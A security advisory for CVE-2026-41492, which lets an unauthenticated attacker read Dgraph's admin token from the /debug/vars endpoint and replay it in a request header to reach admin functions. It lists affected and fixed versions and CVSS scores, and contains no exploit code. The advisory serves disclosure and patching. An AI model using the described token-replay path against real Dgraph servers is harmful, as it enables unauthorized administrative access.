CVE-2026-41492
Published:April 24, 2026
Updated:April 26, 2026
Dgraph is an open source distributed GraphQL database. Prior to 25.3.3, Dgraphl exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can retrieve that token and replay it in the X-Dgraph-AuthToken header to access admin-only endpoints. This is a variant of the previously fixed /debug/pprof/cmdline issue, but the current fix is incomplete because it blocks only /debug/pprof/cmdline and still serves http.DefaultServeMux, which includes expvar's /debug/vars handler. This vulnerability is fixed in 25.3.3.
Affected Packages
https://github.com/dgraph-io/dgraph.git (GITHUB):
Affected version(s) >=v0.3 <v24.1.8Fix Suggestion:
Update to version v24.1.8https://github.com/dgraph-io/dgraph.git (GITHUB):
Affected version(s) >=v25.3.0 <v25.3.3Fix Suggestion:
Update to version v25.3.3github.com/dgraph-io/dgraph (GO):
Affected version(s) >=v0.3 <v25.3.3Fix Suggestion:
Update to version v25.3.3Related Resources (2)
Do you need more information?
Contact UsCVSS v4
Base Score:
9.3
Attack Vector
NETWORK
Attack Complexity
LOW
Attack Requirements
NONE
Privileges Required
NONE
User Interaction
NONE
Vulnerable System Confidentiality
HIGH
Vulnerable System Integrity
HIGH
Vulnerable System Availability
HIGH
Subsequent System Confidentiality
NONE
Subsequent System Integrity
NONE
Subsequent System Availability
NONE
CVSS v3
Base Score:
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality
HIGH
Integrity
HIGH
Availability
HIGH
Weakness Type (CWE)
Exposure of Sensitive Information to an Unauthorized Actor
